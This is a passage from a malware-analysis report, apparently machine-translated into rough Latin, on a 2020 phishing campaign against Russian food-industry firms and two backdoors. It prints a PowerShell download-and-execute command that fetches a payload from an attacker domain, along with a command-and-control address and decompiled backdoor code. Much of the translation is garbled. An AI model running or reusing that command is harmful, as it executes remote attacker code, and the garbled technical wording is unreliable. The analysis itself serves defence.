Experientia nostra in investigatione securitatis computatrum incidentes ostendit inscriptio adhuc unum e canalibus communioribus ab oppugnatoribus adhibitis ut initio retis substructiones aggressi penetrarent. Una actio neglegentis cum suspecta (vel non ita suspecta) littera fit punctum infectio ulterioris notae, quam ob rem cybercriminales activo modo utuntur modi machinandi sociales, licet variis successus gradibus.
In hac statione loqui volumus de recenti investigatione nostra in spam expeditione, quae pluribus inceptis in Russica cibus et industria complexus est. Omnes impetus eandem missionem secutae sunt utentes fictis electronicis, et nemo multum conatus in textu harum inscriptionum electronicarum videbatur.
intelligentia ministerium
Omnia in fine mensis Aprilis 2020 inceperunt, cum Doctor Web virus analystae spamma expeditionem deprehendit in qua hackers misit directorium telephonicum renovatum ad ministros complurium inceptis in materia Russica cibus et industria complexus. Utique, hoc non erat simplex sollicitudinis spectaculum, cum directorium reale non esset, ac documenta .docx e longinquis facultatibus duas imagines emitterent.
Una earum recepta est ad computatorium usoris ex nuntio [.] zannews[.]com servo. Notabile est nomen regio- nis simile cum regione mediae anti-corruptionis mediae Kazakhstaniae - zannews [.]kz. Ex altera parte, dominium adhibitum statim simile belli alterius 2015 quod TOPNEWS notum est, quo posticum ICEFOG usus est et dominia Troiana cum substring "nuntio" in nominibus suis habuit. Aliud interesting pluma erat quod cum emails ad diversos recipientes mittens, postulavit ut imaginem extraheret usus vel parametris vel diversis nominibus imaginis singularis.
Hoc factum esse credimus ad colligendas informationes ad cognoscendum "fidum" alloquentem, qui tunc praestabitur ut epistulam tempore suo aperiat. Protocollum SMB usus est imaginem e secundo servo detrahendo, quod fieri poterat ut reteNTLM hashes colligeret ex calculis conductorum qui documentum receptum aperuit.
Et hic est ipsa epistula cum indice ficto:
Mense Iunio huius anni, hackers incepit novo nomine regio uti, lusus []manhajnews[.]com, ad imagines imposuistis. Analysis ostendit manhajnews com subdomains in spam mailings adhibitos esse cum saltem Septembris 2019 Una scutorum huius expeditionis magna erat universitas Russiae.
Etiam, mense Iunio, moderatores oppugnationis cum novo textu litterarum suarum accesserunt: hoc tempore documentum notitias de industria evolutionis continebat. Litterae textus luculenter indicatum est auctorem suum aut non indigenum esse oratorem Russorum aut de industria talem impressionem de se creasse. Infeliciter, ideae progressionis industriae, sicut semper, tantum operculum evaserunt - documentum denuo duas imagines eiecit, cum server mutatus est in inklingpaper [.]com.
Proxima innovatio mense Iulio secuta est. In conatu deprehensio documentorum malignorum ab antiviro programmatis, oppugnatores coeperunt uti documenta Microsoft Verbi in tessera inscripta. Eodem tempore oppugnatores technicis socialibus classicis uti constituerunt - notificatione praemii.
Textus appellationis iterum eodem stilo scriptus est, qui adiectionem suspicionis apud Lucilium excitavit. Servo ad imaginem deprimendam etiam non mutata est.
Nota in omnibus casibus, electronicas litteras electronicas in electronicas relatas [.]ru et yandex[.]ru ditiones esse adhibitas litteras mittere.
impetus
Primo Septembris MMXX, tempus agendi fuit. Virus noster analystae novam oppugnationum undam memoriae prodiderunt, in qua oppugnatores denuo litteras miserunt sub praetextu adaequationis directorii telephonici. Sed hoc tempus tortor malitiosam affectum continebat.
Cum documentum adnexum aperiens, tortor duo fasciculi creavit;
- VBS script %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, quod erat fasciculum batch mittere in animo;
- Fasciculus ipse batch %APPDATA%configstest.bat, quae obfuscata erat.
Essentia sui operis descendit ad corticem Powershell deducendum cum quibusdam parametris. Parametri testudinem decoctae in jussa;
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Ut sequitur ex mandatis praesentatis, dominium ex quo payload recepta est, iterum in situ nuntiorum dissimulatur. Innocens , cuius unum opus est ex mandato et potestate ministris accipere et exsequi. Duo genera postorum cognoscere potuimus quae in PC victimae institui possunt.
BackDoor.Siggen2.3238
Primum est BackDoor.Siggen2.3238 — Nostri antea non congressi sunt, nulla etiam huius programmatis mentione ab aliis antiviris concionatoribus.
Haec programma est posticum in C ++ et currit in Fenestra systematis operantis XXXII.
BackDoor.Siggen2.3238 communicare potest cum servo administratione duobus protocollis utentibus: HTTP et HTTPS. Probata specimen protocollo HTTPS utitur. In sequentibus User-Agens in petitiones servo:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Hoc in casu, omnes petitiones parametrorum sequenti ordine supplentur;
%s;type=%s;length=%s;realdata=%send
ubi singulae lineae% s correspondenter substituitur:
- ID computatri infecti;
- genus petitionis missum;
- longitudo data in realdata agro;
- data.
In stadio colligendi informationes de systemate infecta, posticum lineam similem gignit;
lan=%s;cmpname=%s;username=%s;version=%s;
ubi lan est IP oratio computatoris infecti, cmpname est nomen computatorium, nomen usoris est nomen usoris, versio est linea 0.0.4.03.
Haec informationes cum sysinfo identifier mittuntur per a Post petitionem ad imperium server sita in https[:]//31.214[.]157.14/log.txt. Si responsio BackDoor.Siggen2.3238 signum cordis accipit, nexus felix habetur, et posticum principale cyclum communicationis cum servo incipit.
Plenior descriptio principiorum operandi BackDoor.Siggen2.3238 est in nostro .
BackDoor.Whitebird.23
Secunda programma est modificatio BackDoor.Whitebird postica, iam nota nobis ab incidente cum procuratione regiminis in Kazakhstan. Haec versio in C ++ scripta est, et in utraque 32 frenum et 64 frenum decurrere fenestras systematum operantium designatur.
Similia pleraque huius generis programmata BackDoor.Whitebird.23 constituebant nexum encryptum cum servo potestate et non legitimum imperium computatoris infecti. Utens aedilis ratio in dropper .
Sample examinavimus malevolam bibliothecam cum duabus exportationibus;
- Google Play
- Test.
In principio sui operis, configurationem decryptas fere in postico corpore utens algorithmum in operatione XOR cum byte 0x99 denotat. Configuratio similis:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Ut assidua eius operatio, posticum in agro determinatum mutat valorem working_hours figurarum. Ager 1440 bytes continet, quae valores 0 vel 1 accipiunt et singulas horas diei significant. Filum separatum efficit pro interfacie retis interfaciei quod audit interfaciem et quaerit de cessione facis in procuratori servo ab infectis computatoriis. Cum tale fasciculum detegitur, posticum informationes de procuratorio suo indice addit. Praeterea sistit per WinAPI coram procuratore InternetQueryOptionW.
Propositum currentem minutum et horam impedit et cum notitia in agro comparat working_hours figurarum. Si valor pro momento diei correspondente nulla non est, tunc nexus constituitur cum servo potestate.
Connexionem servo constituens simulat creationem connexionis utens versionis TLS 1.0 protocollum inter clientem et ministratorem. Corpus posticum duo buffers continet.
Primum quiddam continet TLS 1.0 Client Salve fasciculum.
Secundum quiddam continet TLS 1.0 Clavis Client Exchange facis cum clavis longitudine 0x100 bytes, Muta Cipher Spec, Encrypted Handshake Nuntius.
Cum Client Hello fasciculum mittens, posticum scribit 4 bytes temporis currentis et 28 bytes de notitia pseudo-passim in campo Client Random, calculata sic:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Recepta fasciculus mittitur ad imperium servo. Responsio (Servo Salve fasciculum) compescit:
- obsequio cum TLS protocollo versionis 1.0;
- correspondentia indicationis temporis (primi 4 bytes Random Datae fasciculi agri) a cliente ad indicatione temporis a servo specificata;
- inserere primae 4 bytes post indicatione temporis in Random Data agri clientis et servientis.
In casu de certa paribus, posticum Clientem Key Exchange fasciculum praeparat. Ad hoc, modificat Clavem Publicam in sarcina Clientis Key Exchange, sicut Encryption IV et Encryption Data in Encrypted Handshake in sarcina Nuntius.
Posticum igitur fasciculum ab imperio ac potestate servo accipit, inhibet versionem protocolli TLS esse 1.0, et deinde aliam 54 bytes (corpus conleci). Hoc nexum perficit habeat.
Plenior descriptio principiorum operandi BackDoor.Whitebird.23 est in nostro .
Conclusio et conclusio
Analysis documentorum, malware et infrastructurae adhibitae permittit ut fiducialiter dicamus oppugnationem ab uno coetuum APT Sinensium praeparatam esse. Considerans functionem backdoors quae in computers victimarum inauguratur in eventu felicis oppugnationis, infectio ducit, minimum, ad furtum secretioris informationis ex machinis consociationum impugnatarum.
Praeterea, missionis valde probabilis est institutio Troianorum peculiarium in ministris localibus cum munere speciali. Hi possent esse moderatores dominii, servitores epistularum, portae interretiales, etc. Sicut perspicere potuimus in exemplo tales servientes peculiarem utilitatem oppugnant variis de causis.
Source: www.habr.com